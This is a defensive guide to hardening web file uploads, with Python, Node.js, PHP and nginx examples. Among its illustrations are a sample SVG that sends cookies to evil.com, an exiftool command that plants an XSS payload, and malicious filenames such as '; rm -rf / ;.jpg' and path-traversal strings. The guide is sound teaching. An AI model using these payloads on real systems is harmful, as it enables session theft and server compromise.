
File Upload Hardening

Building Securely Without Delay

Web risk is rarely mysterious. It usually lies in predictable mistakes that persist under time pressure.

In File Upload Hardening you reduce risk with type checking, isolation, scanning, and restricted execution permissions.

This turns security from an afterthought into a standard quality attribute of your product.

Immediate measures (15 minutes)

First implement input validation, safe output encoding, and parameterized queries.
Harden authentication, session management, and security headers as a baseline.
Embed measures in CI/CD with tests, linting, and release gates.

Why this matters

The goal of file upload hardening is practical risk reduction. Technical background helps you choose the right measures, but what counts is that they are actually implemented and embedded in your development process.

Why file uploads are dangerous

An unsecured file upload opens the door to virtually every attack category:

Attack	Mechanism	Impact
Malware distribution	Server is used to host and distribute malware	Reputational damage, legal liability
Path traversal	Filename contains `../../` to write outside the upload directory	Overwriting configuration files, RCE
Denial of Service	Extremely large files or enormous numbers of uploads	Disk space exhausted, service unavailable
Stored XSS via SVG	SVG file with embedded `<script>` tags	Session theft, account takeover
Stored XSS via HTML	HTML file with JavaScript, served with `text/html`	Session theft, phishing
EXIF data injection	Metadata in images contains payloads	XSS, SQL injection via metadata parsing
XML External Entity	Files with XML structure (SVG, DOCX, XLSX) contain XXE payloads	SSRF, file disclosure
Polyglot files	File is simultaneously a valid JPEG and a valid PHP script	Bypass of validation, RCE

The key question is not whether your upload functionality is vulnerable, but how many layers of defense you have put in place before an attacker reaches the crown jewels.

File type validation

Extension allowlist

Always use an allowlist of permitted extensions, never a blocklist. A blocklist is by definition incomplete: you block .php but forget .phtml, .pht, .php5, .phar, or .shtml.

# Python - extension allowlist
import os

ALLOWED_EXTENSIONS = {'.jpg', '.jpeg', '.png', '.gif', '.pdf', '.docx'}

def allowed_file(filename: str) -> bool:
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED_EXTENSIONS

// Node.js - extension allowlist
const path = require('path');

const ALLOWED_EXTENSIONS = new Set(['.jpg', '.jpeg', '.png', '.gif', '.pdf', '.docx']);

function allowedFile(filename) {
  const ext = path.extname(filename).toLowerCase();
  return ALLOWED_EXTENSIONS.has(ext);
}

MIME type validation

The Content-Type header is set by the client and is therefore fundamentally unreliable. An attacker can upload a PHP webshell with Content-Type: image/jpeg. Verify the MIME type server-side based on the file contents:

# Python - server-side MIME detection with python-magic
import magic

def validate_mime(filepath: str, allowed_mimes: set) -> bool:
    mime = magic.from_file(filepath, mime=True)
    return mime in allowed_mimes

ALLOWED_MIMES = {'image/jpeg', 'image/png', 'image/gif', 'application/pdf'}

// Node.js - MIME detection with file-type (works on magic bytes)
import { fileTypeFromFile } from 'file-type';

async function validateMime(filepath, allowedMimes) {
  const result = await fileTypeFromFile(filepath);
  if (!result) return false;
  return allowedMimes.has(result.mime);
}

// PHP - finfo for MIME detection
function validateMime(string $filepath, array $allowedMimes): bool {
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($filepath);
    return in_array($mime, $allowedMimes, true);
}

Magic bytes validation

Magic bytes (file signatures) are the first bytes of a file that identify the format. This is more reliable than extensions or Content-Type headers, but not watertight: polyglot files can have valid magic bytes and still contain malicious code.

File type	Magic bytes (hex)	Extension	MIME type
JPEG	`FF D8 FF`	`.jpg`, `.jpeg`	`image/jpeg`
PNG	`89 50 4E 47 0D 0A 1A 0A`	`.png`	`image/png`
GIF87a	`47 49 46 38 37 61`	`.gif`	`image/gif`
GIF89a	`47 49 46 38 39 61`	`.gif`	`image/gif`
PDF	`25 50 44 46 2D`	`.pdf`	`application/pdf`
ZIP (DOCX/XLSX)	`50 4B 03 04`	`.zip`, `.docx`, `.xlsx`	`application/zip`
RIFF (WebP)	`52 49 46 46`, followed by `57 45 42 50` at offset 8	`.webp`	`image/webp`
SVG	`3C 3F 78 6D 6C` (`<?xml`) or `3C 73 76 67` (`<svg`); text format, no fixed signature	`.svg`	`image/svg+xml`

# Python - magic bytes validation
MAGIC_BYTES = {
    b'\xff\xd8\xff': 'image/jpeg',
    b'\x89PNG\r\n\x1a\n': 'image/png',
    b'GIF87a': 'image/gif',
    b'GIF89a': 'image/gif',
    b'%PDF-': 'application/pdf',
}

def check_magic_bytes(filepath: str) -> str | None:
    with open(filepath, 'rb') as f:
        header = f.read(8)
    # Named "signature" so the loop does not shadow the python-magic module
    for signature, mime in MAGIC_BYTES.items():
        if header.startswith(signature):
            return mime
    return None
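The table lists WebP under the RIFF prefix, but `52 49 46 46` alone also matches other RIFF containers such as WAV. A minimal sketch of an offset-aware check follows; the `SIGNATURES` table and `sniff_header` name are illustrative assumptions, not part of the code above, and the caller is assumed to pass at least the first 12 bytes of the file.

```python
from typing import Optional

# Each type is described by (offset, bytes) pairs that must ALL match.
# Hypothetical table for illustration; extend it for the types you accept.
SIGNATURES = {
    'image/jpeg': [(0, b'\xff\xd8\xff')],
    'image/png': [(0, b'\x89PNG\r\n\x1a\n')],
    # RIFF container: bytes 4-7 hold the chunk size, the format tag is at 8.
    'image/webp': [(0, b'RIFF'), (8, b'WEBP')],
}


def sniff_header(header: bytes) -> Optional[str]:
    """Return the MIME type whose signature parts all match, else None."""
    for mime, parts in SIGNATURES.items():
        if all(header[off:off + len(sig)] == sig for off, sig in parts):
            return mime
    return None
```

With this shape a WAV file, which also starts with `RIFF`, yields `None` instead of being mistaken for WebP.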

Combined validation

Never rely on a single layer. Combine all three methods:

def validate_upload(filename: str, filepath: str) -> bool:
    # Layer 1: extension
    if not allowed_file(filename):
        return False
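    # Layer 2: magic bytes. MAGIC_BYTES has no ZIP signature, so .docx passes
    # layer 1 but is rejected here until a signature and MIME type are added.
    detected_type = check_magic_bytes(filepath)
    if detected_type not in ALLOWED_MIMES:
        return False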
    # Layer 3: server-side MIME
    if not validate_mime(filepath, ALLOWED_MIMES):
        return False
    return True
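The three layers above each compare against a global allowlist, but none of them checks that the layers agree with each other: a PDF renamed to `photo.png` would pass all three. One possible extra step is sketched below; `EXTENSION_TO_MIMES` and `extension_matches_content` are hypothetical names introduced for illustration.

```python
import os
from typing import Optional

# Hypothetical mapping: which detected MIME types each extension may carry.
EXTENSION_TO_MIMES = {
    '.jpg': {'image/jpeg'},
    '.jpeg': {'image/jpeg'},
    '.png': {'image/png'},
    '.gif': {'image/gif'},
    '.pdf': {'application/pdf'},
}


def extension_matches_content(filename: str, detected_mime: Optional[str]) -> bool:
    """True only if the detected type is one the extension is allowed to carry."""
    ext = os.path.splitext(filename)[1].lower()
    # Unknown extensions map to an empty set, so they never match.
    return detected_mime in EXTENSION_TO_MIMES.get(ext, set())
```

It could be called with the result of the server-side detection, for example `extension_matches_content(filename, check_magic_bytes(filepath))`.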

Filename sanitization

The original filename of an upload is user input and must be treated as such. Never trust it.

Dangerous filenames

Attack technique	Example	Risk
Path traversal	`../../../etc/cron.d/backdoor`	Overwriting files outside upload dir
Null byte injection	`shell.php%00.jpg`	Old parsers see `.jpg`, server executes `.php`
Double extension	`document.php.jpg`	Depending on server configuration: execution as PHP
Unicode tricks	`image\u202E\u0067np.php` (right-to-left override)	Filename appears as `imagephp.png` in UI
Overlength name	`A` x 10000 + `.jpg`	Buffer overflows, filesystem errors
Special characters	`; rm -rf / ;.jpg`	Command injection with unsafe processing
Windows reserved	`CON.jpg`, `NUL.png`, `AUX.pdf`	System errors on Windows servers
Dots and spaces	`shell.php.` or `shell.php ` (trailing space)	Windows strips trailing dots/spaces: becomes `shell.php`
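Several of the patterns in this table can be detected mechanically, which is useful for logging and alerting even when the file is renamed anyway. The sketch below is illustrative only: `filename_red_flags`, the flag labels, and the 255-character limit are assumptions, and double extensions are deliberately not covered because renaming handles them.

```python
import re
import unicodedata
from typing import List

WINDOWS_RESERVED = (
    {'CON', 'PRN', 'AUX', 'NUL'}
    | {f'COM{i}' for i in range(1, 10)}
    | {f'LPT{i}' for i in range(1, 10)}
)
MAX_NAME_LENGTH = 255  # assumed limit for a single path component


def filename_red_flags(name: str) -> List[str]:
    """Return labels for suspicious traits found in a client-supplied name."""
    flags = []
    if '\x00' in name or '%00' in name:
        flags.append('null byte')
    if '/' in name or '\\' in name or '..' in name:
        flags.append('path traversal')
    # Category "Cf" covers invisible format characters such as U+202E.
    if any(unicodedata.category(ch) == 'Cf' for ch in name):
        flags.append('unicode format character')
    if len(name) > MAX_NAME_LENGTH:
        flags.append('overlength')
    if name != name.rstrip('. '):
        flags.append('trailing dot or space')
    if name.split('.')[0].upper() in WINDOWS_RESERVED:
        flags.append('windows reserved name')
    if re.search(r'[;&|`$<>]', name):
        flags.append('shell metacharacter')
    return flags
```

An empty list does not mean the name is safe to use on disk; it only means none of these specific patterns were seen.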

Safe approach: renaming

The safest strategy is to completely ignore the original filename and assign a UUID:

import uuid
import os

def safe_filename(original_filename: str) -> str:
    ext = os.path.splitext(original_filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"Extension not allowed: {ext}")
    return f"{uuid.uuid4().hex}{ext}"

// Node.js
const { randomUUID } = require('crypto');
const path = require('path');

function safeFilename(originalFilename) {
  const ext = path.extname(originalFilename).toLowerCase();
  if (!ALLOWED_EXTENSIONS.has(ext)) {
    throw new Error(`Extension not allowed: ${ext}`);
  }
  return `${randomUUID().replace(/-/g, '')}${ext}`;
}

If you want to preserve the original name (for example for user-friendliness), store it in the database but use the UUID on the filesystem:

# Database: preserve original name, UUID on disk
upload = Upload(
    original_name=secure_filename(file.filename),
    stored_name=safe_filename(file.filename),
    uploaded_by=current_user.id
)

os.path.basename() is not enough

os.path.basename() prevents path traversal but does not protect against double extensions, null bytes, or Unicode tricks. Use it as an additional layer, not as the sole defense:

# Minimum: basename + Werkzeug secure_filename
import os

from werkzeug.utils import secure_filename

name = secure_filename(os.path.basename(uploaded_name))
# Better: UUID + store original name in database
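To make the limits concrete, the sketch below uses `posixpath` and `ntpath`, the POSIX and Windows flavours behind `os.path`, so the behaviour is the same on any machine. The helper name `strip_directories` is an assumption for illustration.

```python
import ntpath
import posixpath


def strip_directories(name: str) -> str:
    """Drop directory parts written with either '/' or '\\' separators."""
    # ntpath treats both separators as path delimiters.
    return ntpath.basename(name)


# Directory components are removed as expected:
print(posixpath.basename('../../etc/cron.d/backdoor'))  # backdoor
# A double extension passes through untouched:
print(posixpath.basename('document.php.jpg'))           # document.php.jpg
# On POSIX a backslash is an ordinary character, so nothing is stripped:
print(posixpath.basename('..\\..\\shell.php'))          # ..\..\shell.php
# The Windows flavour handles both separators:
print(strip_directories('..\\..\\shell.php'))           # shell.php
```

Even with both separators handled, the result still carries whatever extension and characters the client chose, which is why renaming remains the stronger option.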

Storage hardening

Store outside the webroot

Rule number one: never store uploads in a directory that is directly served by the web server. If an attacker uploads a webshell to /var/www/html/uploads/, they can call it directly via the browser.

# Wrong: inside webroot
/var/www/html/
  ├── index.php
  └── uploads/        <-- directly accessible via http://site/uploads/
      └── shell.php   <-- http://site/uploads/shell.php = RCE

# Correct: outside webroot
/var/www/html/
  └── index.php
/srv/uploads/          <-- not directly accessible via HTTP
  └── a3f8b2c1.jpg

Serve uploads via an application route that enforces access control and content-type headers:

# Flask - serve uploads via application
@app.route('/files/<file_id>')
@login_required
def serve_file(file_id):
    upload = Upload.query.get_or_404(file_id)
    return send_from_directory(
        app.config['UPLOAD_FOLDER'],
        upload.stored_name,
        mimetype=upload.detected_mime,  # No text/html!
        as_attachment=True
    )
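Flask's `send_from_directory` refuses paths that escape the given directory. For code paths that open files directly, a comparable containment check can be sketched as follows; `resolve_inside` is a hypothetical helper, and `/srv/uploads` is the example directory used above.

```python
from pathlib import Path


def resolve_inside(root: str, stored_name: str) -> Path:
    """Return the absolute path of stored_name, or raise if it escapes root."""
    root_path = Path(root).resolve()
    # resolve() collapses '..' segments and follows symlinks before we compare.
    candidate = (root_path / stored_name).resolve()
    if root_path not in candidate.parents:
        raise ValueError('path escapes upload directory')
    return candidate


# Example: a UUID-style name stays inside the upload directory.
print(resolve_inside('/srv/uploads', 'a3f8b2c1.jpg').name)
```

Both `../outside.txt` and an absolute path such as `/etc/passwd` raise `ValueError`, because the resolved candidate no longer has the upload root among its parents.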

Dedicated storage service

Preferably use object storage (S3, GCS, Azure Blob) with pre-signed URLs:

# AWS S3 - pre-signed upload URL
import boto3

s3 = boto3.client('s3')

def generate_upload_url(bucket: str, key: str, expires: int = 300) -> str:
    return s3.generate_presigned_url(
        'put_object',
        Params={
            'Bucket': bucket,
            'Key': key,
            'ContentType': 'image/jpeg',
        },
        ExpiresIn=expires
    )

# Pre-signed download URL
def generate_download_url(bucket: str, key: str, expires: int = 3600) -> str:
    return s3.generate_presigned_url(
        'get_object',
        Params={
            'Bucket': bucket,
            'Key': key,
            'ResponseContentDisposition': 'attachment',
        },
        ExpiresIn=expires
    )

No execute permissions

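Ensure that uploaded files never carry the execute bit. The directory itself still needs the execute (search) permission so that the application can open files inside it. Note that this only stops direct execution; it does not stop a web server from handing a readable script to an interpreter such as PHP, which is why storing uploads outside the webroot comes first: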

# Filesystem permissions
chmod 750 /srv/uploads
chown www-data:www-data /srv/uploads
# No execute bit on files
chmod 640 /srv/uploads/*
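Instead of fixing permissions after the fact, the application can create each file with the right mode from the start. This is a minimal sketch assuming a POSIX filesystem; `write_upload` is a hypothetical helper name.

```python
import os


def write_upload(path: str, data: bytes) -> None:
    """Create a new file with mode 0o640; fail if the path already exists."""
    # O_EXCL makes creation fail rather than overwrite an existing file.
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL
    fd = os.open(path, flags, 0o640)
    with os.fdopen(fd, 'wb') as f:
        f.write(data)
```

The process umask can only remove bits from the requested mode, so the resulting file never gains an execute bit this way.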

Nginx: block execution in upload directory

# nginx - block script execution in upload location
location /uploads/ {
    # Force download, never execute
    add_header Content-Disposition "attachment" always;
    add_header X-Content-Type-Options "nosniff" always;

    # Explicitly block all script extensions
    location ~* \.(php|phtml|php5|phar|pl|py|cgi|asp|aspx|jsp|sh|bash)$ {
        deny all;
        return 403;
    }

    # No directory listing
    autoindex off;
}

Separate domain for user content

Serve user-generated content from a separate domain to leverage cookie scope and same-origin policy as a defense layer:

# Main application
app.example.com          -> session cookies, CSRF tokens

# User content (separate domain, no cookies from main app)
content.example.com      -> uploads, profile images

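If an attacker achieves XSS via an uploaded SVG file on content.example.com, the script runs in a different origin and cannot read host-only cookies set by app.example.com. This holds only if session cookies are set without a Domain=example.com attribute: a cookie scoped to the parent domain is also sent to content.example.com. A completely separate registrable domain for user content avoids that pitfall altogether.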
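Whether the content host really sees no cookies depends on how the main application scopes them. The sketch below is a simplified model of cookie domain matching as described in RFC 6265; it ignores Path, Secure, and SameSite, and `cookie_is_sent` is a hypothetical name.

```python
from typing import Optional


def cookie_is_sent(set_by_host: str, domain_attr: Optional[str], request_host: str) -> bool:
    """Simplified domain matching: would the browser attach this cookie?"""
    if domain_attr is None:
        # Host-only cookie: returned only to the exact host that set it.
        return request_host.lower() == set_by_host.lower()
    domain = domain_attr.lstrip('.').lower()
    host = request_host.lower()
    # A Domain attribute covers the domain itself and all its subdomains.
    return host == domain or host.endswith('.' + domain)


# Host-only session cookie from the app: not sent to the content host.
print(cookie_is_sent('app.example.com', None, 'content.example.com'))           # False
# Cookie scoped to the parent domain: also sent to the content host.
print(cookie_is_sent('app.example.com', 'example.com', 'content.example.com'))  # True
```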

Size and quantity limits

Without limits, your upload endpoint is an invitation for Denial of Service.

Server configuration

# nginx - maximum body size
http {
    client_max_body_size 10m;    # Global: max 10 MB
    client_body_timeout 30s;     # Timeout for receiving body
    client_body_buffer_size 128k;
}

# Per location override
location /api/upload {
    client_max_body_size 25m;    # Specific endpoint: max 25 MB
}

# Apache
LimitRequestBody 10485760

Application limits

# Flask - file size limit
app.config['MAX_CONTENT_LENGTH'] = 10 * 1024 * 1024  # 10 MB

@app.errorhandler(413)
def too_large(e):
    return jsonify(error="File too large (max 10 MB)"), 413
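A configured maximum can be complemented by a second check while the bytes are written to disk, which also covers code paths that do not go through the framework limit. The following is a sketch under that assumption; `copy_with_limit` and `UploadTooLarge` are hypothetical names.

```python
import io
from typing import BinaryIO


class UploadTooLarge(Exception):
    """Raised when a stream delivers more bytes than allowed."""


def copy_with_limit(src: BinaryIO, dst: BinaryIO, max_bytes: int,
                    chunk_size: int = 64 * 1024) -> int:
    """Copy src to dst in chunks, aborting once max_bytes is exceeded."""
    total = 0
    while True:
        chunk = src.read(chunk_size)
        if not chunk:
            return total
        total += len(chunk)
        if total > max_bytes:
            # Stop before writing the chunk that crosses the limit.
            raise UploadTooLarge(f'upload exceeds {max_bytes} bytes')
        dst.write(chunk)


# Example with in-memory streams
out = io.BytesIO()
print(copy_with_limit(io.BytesIO(b'a' * 100), out, max_bytes=100))  # 100
```

The caller is expected to delete the partially written destination file when `UploadTooLarge` is raised.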

// Express + multer - file size and quantity limits
const multer = require('multer');
const path = require('path');

const upload = multer({
  dest: '/srv/uploads/',
  limits: {
    fileSize: 10 * 1024 * 1024,  // 10 MB per file
    files: 5,                     // Max 5 files per request
    fields: 10,                   // Max 10 form fields
  },
  fileFilter: (req, file, cb) => {
    const allowed = ['.jpg', '.jpeg', '.png', '.gif', '.pdf'];
    const ext = path.extname(file.originalname).toLowerCase();
    cb(null, allowed.includes(ext));
  }
});

app.post('/upload', upload.array('files', 5), (req, res) => {
  res.json({ uploaded: req.files.length });
});

Rate limiting

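# Flask-Limiter - limit uploads per time unit
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

# Flask-Limiter 3.x: key_func is the first argument, app is passed by keyword
limiter = Limiter(get_remote_address, app=app)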

@app.route('/upload', methods=['POST'])
@limiter.limit("10/hour")          # Max 10 uploads per hour per IP
@limiter.limit("3/minute")         # Max 3 per minute
def upload_file():
    ...
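To illustrate what a limit such as "3/minute" means in practice, here is a small in-memory sliding-window limiter. It is a sketch for understanding only, not how Flask-Limiter is implemented; `SlidingWindowLimiter` is a hypothetical class, and a real deployment with several workers would need shared storage.

```python
import time
from collections import defaultdict, deque
from typing import Callable


class SlidingWindowLimiter:
    """Allow at most `limit` events per key within `window_seconds`."""

    def __init__(self, limit: int, window_seconds: float,
                 clock: Callable[[], float] = time.monotonic):
        self.limit = limit
        self.window = window_seconds
        self.clock = clock  # injectable so the behaviour can be tested
        self.hits = defaultdict(deque)

    def allow(self, key: str) -> bool:
        now = self.clock()
        timestamps = self.hits[key]
        # Forget events that have fallen out of the window.
        while timestamps and now - timestamps[0] >= self.window:
            timestamps.popleft()
        if len(timestamps) >= self.limit:
            return False
        timestamps.append(now)
        return True
```

The key can be the client IP, as in the example above, or an authenticated user ID when many users share one address.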

Antivirus scanning

Scan every uploaded file for malware before it is stored or made available.

ClamAV integration

# Install ClamAV and start daemon
sudo apt install clamav clamav-daemon
sudo freshclam                     # Signature update
sudo systemctl start clamav-daemon

# Python - scanning with pyclamd
import pyclamd

class VirusScanner:
    def __init__(self):
        self.cd = pyclamd.ClamdUnixSocket('/var/run/clamav/clamd.ctl')
        if not self.cd.ping():
            raise RuntimeError("ClamAV daemon not reachable")

    def scan_file(self, filepath: str) -> tuple[bool, str | None]:
        """Returns (is_clean, threat_name)."""
        result = self.cd.scan_file(filepath)
        if result is None:
            return True, None
        # result = {'/path/to/file': ('FOUND', 'Eicar-Test-Signature')}
        status, threat = list(result.values())[0]
        return False, threat

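# Usage in upload handler
import shutil

scanner = VirusScanner()

@app.route('/upload', methods=['POST'])
def upload():
    file = request.files['file']
    try:
        # safe_filename raises ValueError for extensions outside the allowlist
        stored_name = safe_filename(file.filename)
    except ValueError:
        return jsonify(error="File type not allowed"), 400
    temp_path = os.path.join('/tmp', stored_name)
    file.save(temp_path)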

    is_clean, threat = scanner.scan_file(temp_path)
    if not is_clean:
        os.remove(temp_path)
        app.logger.warning(f"Malware detected: {threat}")
        return jsonify(error="File rejected by virus scanner"), 400

    # File is clean, move to permanent storage
    final_path = os.path.join(app.config['UPLOAD_FOLDER'], os.path.basename(temp_path))
    shutil.move(temp_path, final_path)
    return jsonify(status="ok"), 201

Note: antivirus scanning is an additional layer, not a replacement for file type validation. AV scanners miss zero-day payloads and custom malware.
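The scan-before-store rule can be expressed as a small quarantine step that fails closed when the scanner itself breaks. This is a sketch under assumptions: `release_from_quarantine` is a hypothetical helper, and `scan` is any callable returning `(is_clean, threat_name)` like `VirusScanner.scan_file` above.

```python
import os
import shutil
from typing import Callable, Optional, Tuple

ScanFn = Callable[[str], Tuple[bool, Optional[str]]]


def release_from_quarantine(quarantine_path: str, final_dir: str, scan: ScanFn) -> str:
    """Move a quarantined file to final_dir only if scan reports it clean."""
    try:
        is_clean, threat = scan(quarantine_path)
    except Exception:
        # Fail closed: a scanner outage must not let files through unscanned.
        os.remove(quarantine_path)
        raise
    if not is_clean:
        os.remove(quarantine_path)
        raise ValueError(f'rejected by scanner: {threat}')
    final_path = os.path.join(final_dir, os.path.basename(quarantine_path))
    shutil.move(quarantine_path, final_path)
    return final_path
```

Passing the scanner in as a function keeps the flow testable without a running ClamAV daemon.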

Image-specific risks

SVG with embedded JavaScript

SVG is XML and can contain arbitrary JavaScript:

<!-- Malicious SVG -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>document.location='https://evil.com/?c='+document.cookie</script>
  <rect width="100" height="100" fill="red"/>
</svg>

Defense: never serve SVG with Content-Type: image/svg+xml if it is user-uploaded content. Use Content-Disposition: attachment or convert to a raster format.
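One way to apply this defense consistently is to derive the response headers from the detected type in a single place. The sketch below assumes the stored name is the UUID-based name generated on upload (so it contains no quotes or control characters); `download_headers` and the `ACTIVE_TYPES` list are illustrative assumptions.

```python
# MIME types a browser may treat as active content (assumed list, extend as needed).
ACTIVE_TYPES = {
    'image/svg+xml',
    'text/html',
    'application/xhtml+xml',
    'text/xml',
    'application/xml',
}


def download_headers(detected_mime: str, stored_name: str) -> dict:
    """Build headers that make the browser download instead of render."""
    # Active types are downgraded to a generic binary type.
    content_type = (
        'application/octet-stream' if detected_mime in ACTIVE_TYPES else detected_mime
    )
    return {
        'Content-Type': content_type,
        'Content-Disposition': f'attachment; filename="{stored_name}"',
        'X-Content-Type-Options': 'nosniff',
    }
```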

EXIF data with payloads

EXIF metadata in JPEG files can contain XSS payloads or SQL injection strings that are triggered when the application parses metadata and displays it without encoding:

# Payload in EXIF Comment field
exiftool -Comment='<script>alert(document.cookie)</script>' photo.jpg
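If the application does display metadata, the value has to be encoded like any other user input. A minimal sketch using the standard library; `render_comment` and the CSS class are hypothetical.

```python
import html


def render_comment(exif_comment: str) -> str:
    """Embed an EXIF comment in HTML with markup characters escaped."""
    return f'<p class="exif-comment">{html.escape(exif_comment)}</p>'


print(render_comment('<script>alert(document.cookie)</script>'))
# <p class="exif-comment">&lt;script&gt;alert(document.cookie)&lt;/script&gt;</p>
```

Template engines with auto-escaping do the same by default; the risk arises where metadata is concatenated into markup by hand or passed to the frontend as trusted HTML.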

Image re-encoding as defense

By re-encoding images you remove embedded scripts, EXIF data, and polyglot constructs:

# Python - strip EXIF and re-encode with Pillow
from PIL import Image

def sanitize_image(input_path: str, output_path: str, max_size: tuple = (4096, 4096)):
    """Re-encode image: strips EXIF, removes embedded content."""
    with Image.open(input_path) as img:
        # Verify that it is actually an image
        img.verify()

    # Reopen after verify (verify makes object unusable)
    with Image.open(input_path) as img:
        # Convert to RGB (removes alpha-channel tricks)
        if img.mode not in ('RGB', 'L'):
            img = img.convert('RGB')

        # Limit dimensions
        img.thumbnail(max_size, Image.LANCZOS)

        # Save without EXIF data
        img.save(output_path, format='JPEG', quality=85, exif=b'')

// Node.js - re-encode with sharp
const sharp = require('sharp');

async function sanitizeImage(inputPath, outputPath) {
  await sharp(inputPath)
    .rotate()                    // Auto-rotate based on EXIF, then strip
    .resize(4096, 4096, {
      fit: 'inside',
      withoutEnlargement: true
    })
    .removeAlpha()
    .jpeg({ quality: 85 })
    .toFile(outputPath);
}

Content-Security-Policy for uploads

Add a strict CSP to responses for user-uploaded content:

@app.after_request
def add_upload_csp(response):
    if request.path.startswith('/files/'):
        response.headers['Content-Security-Policy'] = (
            "default-src 'none'; "
            "style-src 'none'; "
            "script-src 'none'; "
            "object-src 'none'"
        )
        response.headers['X-Content-Type-Options'] = 'nosniff'
    return response

It is always a delight to see how applications handle file uploads. "The user can upload a profile photo here," says the product owner, with full confidence that users will obediently pick a 200x200 JPEG. Meanwhile you have just built a direct pipeline from the public internet to your server's filesystem, protected by exactly zero layers of validation and an extension blocklist that contains .exe and .bat but forgot .php. Because yes, who uploads a PHP file as a profile photo? Only everyone who wants to take over your application. But no worries -- the Content-Type header says image/jpeg, so it must be safe. That header is after all set by... the attacker. The same type of logic as a nightclub that asks visitors to write their own age on a note. "He wrote 21, let him through." And to top it all off we store everything nicely in /var/www/html/uploads/, directly accessible and executable via the browser, because that saves us configuring a proxy route. Security by convenience.

Common mistakes

#	Mistake	Why it is dangerous	Solution
1	Extension check only	Trivially bypassed by renaming	Combine with magic bytes and MIME detection
2	Blocklist instead of allowlist	You always forget an extension (`.phtml`, `.phar`, `.shtml`)	Use a strict allowlist
3	Trusting the Content-Type header	Set by the client, fully manipulable	Server-side detection with libmagic/file-type
4	Storage in webroot	Direct execution of uploaded script	Store outside webroot, serve via application
5	Keeping the original filename	Path traversal, double extensions, Unicode tricks	UUID renaming, original name in database
6	No size limit	DoS through large uploads	Configure max on web server and application
7	No rate limiting	Brute force upload, disk space exhaustion	Limit per IP per time unit
8	Allowing SVG without sanitization	Embedded JavaScript, XSS	Block SVG or convert to raster
9	Passing EXIF data to frontend	XSS via metadata fields	Strip EXIF, re-encode images
10	No antivirus scanning	Malware distribution via your platform	Integrate ClamAV or similar scanner
11	No Content-Disposition header	Browser renders file instead of downloading	Always `attachment` for user content
12	Same domain for app and uploads	XSS in upload has access to session cookies	Use a separate content domain

Checklist

Priority	Measure	Implementation
CRITICAL	Extension allowlist	Code: only accept explicitly permitted extensions
CRITICAL	Magic bytes validation	Code: python-magic, file-type, finfo
CRITICAL	Storage outside webroot	Infrastructure: separate directory, serve via app route
CRITICAL	Filename sanitization	Code: UUID renaming, original name in database
HIGH	Size limits	Web server: `client_max_body_size`; App: `MAX_CONTENT_LENGTH`
HIGH	Remove execute permissions	Infrastructure: `chmod`, nginx location block
HIGH	Content-Disposition header	Code/web server: `attachment` for all user uploads
HIGH	X-Content-Type-Options: nosniff	Code/web server: prevent MIME sniffing by browser
HIGH	Image re-encoding	Code: Pillow/sharp for strip EXIF + re-encode
MEDIUM	Antivirus scanning	Infrastructure: ClamAV daemon + pyclamd integration
MEDIUM	Rate limiting	Code: Flask-Limiter, express-rate-limit
MEDIUM	Separate content domain	Infrastructure: `content.example.com` for user uploads
MEDIUM	CSP on upload responses	Code: strict `Content-Security-Policy` header
LOW	Pre-signed URLs (S3/GCS)	Infrastructure: object storage with temporary URLs
LOW	SVG-to-raster conversion	Code: Pillow/sharp/Inkscape for SVG sanitization

Summary -- File upload hardening requires a defense-in-depth strategy. No single measure is sufficient on its own: an allowlist on extensions is bypassed by polyglot files, magic bytes validation misses custom payloads, and antivirus scanning does not catch zero-days. The combination of strict file type validation (extension + magic bytes + MIME), filename sanitization (UUID renaming), secure storage (outside webroot, without execute permissions, separate domain), size and rate limits, antivirus scanning, and image re-encoding together form a robust defense. Treat every upload as potentially malicious -- because it is, until proven otherwise.

In the next chapter we cover OAuth 2.0 and OpenID Connect -- how to securely delegate authentication and authorization to identity providers, and which mistakes you absolutely must avoid.
